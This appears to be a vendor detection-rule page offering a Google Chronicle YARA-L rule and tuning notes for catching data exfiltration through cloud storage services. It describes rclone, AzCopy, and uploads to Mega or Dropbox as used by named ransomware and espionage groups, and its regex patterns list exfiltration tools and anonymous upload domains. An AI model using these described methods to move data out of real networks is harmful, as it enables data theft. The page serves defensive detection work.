THREAT-CloudStorage-DataExfil Google Chronicle · YARA-L

Detect Data Exfiltration via Cloud Storage Services in Google Chronicle

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).

MITRE ATT&CK

Tactic
Exfiltration

YARA-L Detection Query

Google Chronicle (YARA-L)
yaral 
rule cloud_storage_data_exfiltration {
  meta:
    author = "df00tech"
    description = "Detects data exfiltration via rclone, AzCopy, and cloud storage API abuse from scripting engines"
    severity = "HIGH"
    mitre_attack_tactic = "Exfiltration"
    mitre_attack_technique = "T1567.002"
    threat_actors = "Scattered Spider, Akira, Black Basta, Lazarus"
    reference = "https://attack.mitre.org/techniques/T1567/002/"

  events:
    $e.metadata.event_type = "PROCESS_LAUNCH"
    (
      re.regex($e.target.process.file.full_path, `(?i)rclone\.exe`)
      or (
        re.regex($e.target.process.file.full_path, `(?i)azcopy\.exe`)
        and re.regex($e.target.process.command_line, `(?i)(blob|file|queue)\.core\.windows\.net`)
      )
      or (
        re.regex($e.target.process.file.full_path, `(?i)(powershell|pwsh|curl|wscript|cscript)\.exe`)
        and re.regex($e.target.process.command_line, `(?i)(mega\.nz|mega\.io|dropbox\.com|dropboxapi\.com|transfer\.sh|gofile\.io|box\.com|box\.net|drive\.google\.com|onedrive\.live\.com|sharefile\.com|sendspace\.com|filebin\.net|anonfiles\.com)`)
      )
    )
    $hostname = $e.principal.hostname

  condition:
    $e
}
high severity high confidence

Chronicle YARA-L 2.0 rule matching PROCESS_LAUNCH UDM events to detect cloud storage data exfiltration. Fires on rclone.exe execution (no command-line filter required — any execution is high-fidelity), AzCopy invocations targeting external Azure storage endpoints, and PowerShell, curl, or script host processes with cloud storage or anonymous upload service domain references in the command line. Covers documented TTPs for Scattered Spider (Mega), Akira and Black Basta (rclone), and Lazarus Group (Dropbox, Google Drive).

Data Sources

Google Chronicle SIEMChronicle UDM (Unified Data Model)Chronicle Forwarder (Windows Events)Google Cloud Endpoint Agent

Required Tables

UDM Events (PROCESS_LAUNCH)

False Positives & Tuning

  • Authorized cloud-to-cloud migrations: IT teams using rclone under approved service accounts for scheduled data migrations — maintain a Chronicle reference list of authorized migration service account principal.user.userid values and add a NOT $e.principal.user.userid in %authorized_migration_accounts exclusion to the events block
  • Azure infrastructure automation: operations or platform engineering teams running AzCopy for Blob Storage management tasks — build a Chronicle reference list of corporate Azure storage account FQDNs and add NOT re.regex($e.target.process.command_line, %corp_storage_accounts) to suppress known-good invocations
  • Sanctioned enterprise file-sharing clients: Google Drive, OneDrive, or Dropbox for Business background sync processes running under standard user accounts — supplement the rule with a condition block counting events per principal.hostname over a time window and tuning on volume rather than presence to avoid suppressing legitimate single-event occurrences
Download portable Sigma rule (.yml)

Other platforms for THREAT-CloudStorage-DataExfil

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.

Last updated: 2026-04-24 Research depth: deep
References (5)

Unlock Pro Content

Get the full detection package for THREAT-CloudStorage-DataExfil including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1567.002Exfiltration to Cloud Storage

Related Techniques

T1567.002Exfiltration to Cloud StorageT1048Exfiltration Over Alternative ProtocolT1005Data from Local SystemT1039Data from Network Shared DriveT1486Data Encrypted for Impact

Same Tactic: Exfiltration

Popular Detections